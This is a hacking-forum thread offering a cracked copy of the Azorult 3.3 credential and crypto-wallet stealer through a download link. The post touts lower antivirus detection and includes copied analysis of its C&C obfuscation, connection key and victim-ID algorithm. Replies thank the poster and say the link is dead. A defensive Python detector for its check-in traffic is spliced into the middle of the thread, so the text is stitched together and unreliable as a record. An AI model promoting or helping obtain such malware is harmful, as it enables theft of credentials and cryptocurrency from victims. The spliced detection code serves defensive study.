Azorult 3.3 & Cracked (PERSONAL USE ONLY)

by agcash6 - 25 November, 2019 - 05:56 AM
ddosdos1112 (banned member) | 16 Posts | 0 Threads | 4 Years of service | #17
(25 November, 2019 - 05:56 AM) agcash6 Wrote:
Azorult 3.3 & Cracked (PERSONAL USE ONLY)

Azorult v3.3



The above states the following improvements and features:

[+] Added support for stealing the following wallet credentials: BitcoinGold, electrumG, btcprivate (electrum-btcp), bitcore, Exodus Eden

[+] Cryptocurrency wallet’s stealer component has been improved.

[+] The loader component was fixed and improved, allowing bat files to be loaded and executed with no errors

[+] Lowered AV detection rate, increased successful installation rate

[+] Slight improvement in admin panel’s performance



Comparison to previous versions

In version 3.2, the C&C domain name was xored with a hardcoded key and then encoded with base64. The current version 3.3 shows a new encryption method to obfuscate the domain name. The script for decryption of the domain’s string can be found in the Appendix below.
Every version of Azorult has a unique xor key for its connection method to the C&C. In version 3.3 the connection key is: [0x3, 0x55, 0xae]. Moreover, every version's connection message contains a prefix (‘getcfg=’ in version 3.1 and ‘G’ in version 3.2) prepended to the id hash before xoring with the connection key. The prefix in version 3.3 is the connection key, which makes the connection message sent to C&C start with 3 zero bytes.

Figure 2: adding connection key as prefix.

Azorult’s C&C server response is divided into 3 parts separated by tags:

<c></c> – the configuration part, encoded with base64

<n></n> – DLLs that Azorult copies to a new directory it creates under the %TEMP% folder. The name of the new directory is unique for every version of Azorult (‘1M0’ in version 3.1 and ‘2fda’ in version 3.2). In the new version, the name of the directory is generated based on the id hash of the victim’s computer. Therefore, the name of the directory will be different for every victim.

The algorithm for generating the directory name is as follows:

Id_hash=hash_func(guid)-hash_func(product_name)-hash_func(user_name)-hash_func(computer_name)-hash_func(guid+product_name+user_name+computer_name)

Directory_name = hash_func(hash_func(Id_hash))

The particular implementation of the hash_func method is outlined in a script, which appears in the Appendix below.

<d></d> – names of application paths that Azorult harvests data from. In version 3.3,



DOWNLOAD

Please leave feedback
If it is determined that anything posted is used for malicious purposes, all threads will be deleted and future ones will stop.

THANK YOUUU
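
The check-in format described in the quoted analysis (connection key prepended to the id hash, then XORed with that same key) gives defenders a network indicator. The following is an added detection example, not part of the original post or the quoted write-up. It assumes the 3-byte key repeats over the message and that the id hash is five hyphen-joined ASCII alphanumeric fields; `classify_body`, `xor_repeat` and the sample bodies are hypothetical and constructed.

```python
import re

# Version 3.3 connection key, as stated in the post above.
KEY_V33 = bytes([0x03, 0x55, 0xAE])

# Assumption: the id hash is five hyphen-joined ASCII alphanumeric fields,
# following the "a-b-c-d-e" shape of the Id_hash formula in the post.
ID_HASH_RE = re.compile(rb"[0-9A-Za-z]+(?:-[0-9A-Za-z]+){4}")


def xor_repeat(data: bytes, key: bytes) -> bytes:
    """XOR data with the key, repeating the key (assumed) over the data."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def classify_body(body: bytes) -> dict:
    """Score one captured HTTP POST body against the v3.3 check-in shape."""
    result = {"zero_prefix": False, "id_hash": None, "verdict": "no match"}
    # The key is prepended and then XORed with itself, so the first
    # len(key) bytes on the wire are zero.
    n = len(KEY_V33)
    if len(body) <= n or body[:n] != bytes(n):
        return result
    result["zero_prefix"] = True
    candidate = xor_repeat(body, KEY_V33)[n:]
    if ID_HASH_RE.fullmatch(candidate):
        result["id_hash"] = candidate.decode("ascii")
        result["verdict"] = "v3.3 check-in shape"
    else:
        # Three leading zero bytes alone are weak evidence (binary uploads).
        result["verdict"] = "zero prefix only"
    return result


# Constructed sample bodies; no real traffic or identifiers.
CONSTRUCTED_ID = b"AAAA1111-BBBB2222-CCCC3333-DDDD4444-EEEE5555"
SAMPLES = {
    "constructed check-in": xor_repeat(KEY_V33 + CONSTRUCTED_ID, KEY_V33),
    "binary upload": bytes(16),
    "form post": b"user=alice&comment=hello",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:22} -> {classify_body(body)['verdict']}")
```

The zero-prefix test alone will match unrelated binary uploads, so the decoded id-hash shape is what separates a likely check-in from noise.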
nexus7101 (banned member) | Registered | 39 Posts | 0 Threads | 4 Years of service | #18
(This post was last modified: 13 December, 2019 - 08:11 AM by nexus7101.)
thank you sir! +1
edit:
link is currently dead :c.
thank you still for the efforts :)
tempie23 (banned member) | Registered | 2 Posts | 0 Threads | 4 Years of service | #19
Any update to dead link? love to get this
This post is by a banned member (GReenBoxPL8)
naranbc (banned member) | Registered | 41 Posts | 0 Threads | 4 Years of service | #21
thanks 4 sharing bro!! :P
wasingo (banned member) | Registered | 10 Posts | 0 Threads | 4 Years of service | #22
thanks 4 sharing bro!!
